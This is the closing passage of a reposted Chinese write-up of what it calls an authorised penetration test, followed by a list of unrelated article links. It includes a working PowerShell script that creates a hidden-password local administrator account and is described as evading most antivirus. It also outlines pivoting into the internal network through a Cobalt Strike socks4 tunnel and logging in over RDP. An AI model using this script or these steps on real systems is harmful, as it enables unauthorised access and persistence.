上传添加用户的 ps1 文件到服务器中,调用 powershell 执行,此方法可以绕过大部分杀软,达到免杀加用户到管理员组的目的 。``` *
powershell 1.ps1
```***************
$computer=Get-WMIObject Win32_ComputerSystem$computername = $computer.name$username = 'admin'$password = '1234qwer..'$desc = 'Local admin account'$computer = [ADSI]"WinNT://$computername,computer"$user = $computer.Create("user", $username)$user.SetPassword($password)$user.Setinfo()$user.description = $desc$user.setinfo()$user.UserFlags = 65536$user.SetInfo()$group = ADSI$group.add("WinNT://$username,user")
添加用户成功后 。
使用 cs 自带的 socks4 隧道 。

文章插图
本机配置 Proxifer 。

文章插图
成功把本机带入目标内网 。
打开远程桌面功能,输入对方的内网 ip 和远程桌面端口,输入用户名密码 。
登录成功,目标安装了服务器安全狗和企业版金山毒霸,到此渗透结束 。

文章插图
总结
由于不懂 java 开发,导致前期的 getshell 耽误了过长时间,未解决的问题,后面还需要再学习 。
渗透过程中走了很多弯路,但也学习到了很多新的知识 。
原文作者:诺言
转载自:https://www.chainnews.com/articles/863749841296.htm#FBXJjD4U33uwNtZKExSFiw
【一次授权渗透实战】
推荐阅读
- 淘宝换货一次后怎么退货 淘宝退换货只能换一次吗
- 惠普|10+%增速狂奔两年!PC第一次蔫儿了 惠普最惨
- 淘宝网店授权书 淘宝店铺怎么授权
- 波轮洗衣机清洗一次多少钱,波轮洗衣机自己在家怎么清洗
- 皮肤黑,想美白?美白总是不成功?一次性告诉你变白的全部方法
- 新能源汽车多久要换一次电池?
- 内网域实战渗透常用命令总结
- 大佬黑客手把手渗透数据库,带小白进入黑客圏
- |职业哭丧人:哭一次给700,一年要哭176天,家人对此却非常不满
- 编发|宝宝防晒霜如何选,用多少,怎么洗?一次说清楚
